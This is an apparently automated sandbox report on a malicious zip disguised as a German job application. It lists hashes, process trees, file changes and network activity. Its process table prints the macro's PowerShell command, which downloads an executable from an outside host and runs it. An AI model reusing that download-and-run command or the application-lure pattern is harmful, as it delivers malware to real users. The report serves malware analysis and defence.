File name: | Sofia Kohl - Bewerbung.do_.zip |
Full analysis: | https://app.any.run/tasks/2b0ed9e2-fd27-4d1d-8890-180fe5b161ed |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 09:46:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 9B03A6CB6468BDC4604770F0D8A4B9DC |
SHA1: | 9963FE1E1AF8CC3D6696F529CE44D41CE24FDC93 |
SHA256: | B43B220DBA62C1DE06507F21F9282F7B729CA4F0AAC621B8762701E8944B4218 |
SSDEEP: | 1536:v+TSJ/HVpPfzYgWgXKDAXYUTd8873IQmshLPz3EyIaJIgDTZqmB9+t+5Knualy:v+2J/HV536sbTd887YzoDELmDF+w5aly |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | Sofia_Kohl_-_Bewerbung.doc |
---|---|
ZipUncompressedSize: | 74517 |
ZipCompressedSize: | 68385 |
ZipCRC: | 0xe86a053e |
ZipModifyDate: | 2018:12:07 18:10:18 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2804 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sofia Kohl - Bewerbung.do_.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
1384 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2804.4971\Sofia_Kohl_-_Bewerbung.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3828 | cmd /c powErshEll(New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','%temp%\xkbkagcm.exe');start %temp%\xkbkagcm.exe | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2220 | powErshEll (New-Object System.Net.WebClient).DownloadFile('http://tokotikotoko.pw/kiki.exe','C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe');start C:\Users\admin\AppData\Local\Temp\xkbkagcm.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2188 | C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503} | C:\Windows\system32\DllHost.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3796 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2788 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Documents\stuffeffect.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2420 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Documents\test.txt | C:\Windows\system32\NOTEPAD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3272 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Users\admin\Documents\test.txt" | C:\Program Files\Notepad++\notepad++.exe | explorer.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: Notepad++ : a free (GNU) source code editor Version: 7.51 | ||||
2376 | "C:\Program Files\Notepad++\updater\gup.exe" -v7.51 | C:\Program Files\Notepad++\updater\gup.exe | notepad++.exe | |
User: admin Company: Don HO [email protected] Integrity Level: MEDIUM Description: GUP : a free (LGPL) Generic Updater Exit code: 0 Version: 4.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR74F3.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D42E3868.png | — | |
MD5:— | SHA256:— | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61MN49Y38H5YN30HP7NI.temp | — | |
MD5:— | SHA256:— | |||
2788 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3CC7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1384 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2804.4971\~$fia_Kohl_-_Bewerbung.doc | pgc | |
MD5:39D216590167BC9CE013C28ED5612724 | SHA256:76D99D07EEE4A746525289A7213D2D79AA906EED82ABD1E93303342F7758E7CA | |||
3272 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\backup\test.txt@2019-01-11_094936 | text | |
MD5:58FB40E425BCD3C45CB3A599C6E98EAA | SHA256:E450CA047E8CC2139174A104D40CB40B9332C913E6E551837AD00978CD0B9967 | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
1384 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6B201768AE2BC792648079482ADEED98 | SHA256:AF09C8392B4C7284A22460DD30CF97DC9F93E699C10DA0F218BED134F8CB0013 | |||
2220 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1a903b.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
1384 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:BCF438605748E274A186CB8D11FE4B58 | SHA256:3C581C69D15BCC05208ADD68B113B24C76D9BC02126746B0CE32E6FB3A69A676 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 195.138.255.24:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCEBPqKHBb9OztDDZjCYBhQzY%3D | DE | der | 471 b | whitelisted |
— | — | GET | 200 | 195.138.255.24:80 | http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEAXk3DuUOKs7hZfLpqGYUOM%3D | DE | der | 727 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 195.138.255.24:80 | ocsp.usertrust.com | AS33891 Netzbetrieb GmbH | DE | whitelisted |
2376 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted |
Domain | IP | Reputation |
---|---|---|
tokotikotoko.pw |
| malicious |
notepad-plus-plus.org |
| whitelisted |
ocsp.usertrust.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET DNS Query to a *.pw domain - Likely Hostile |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabl |
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|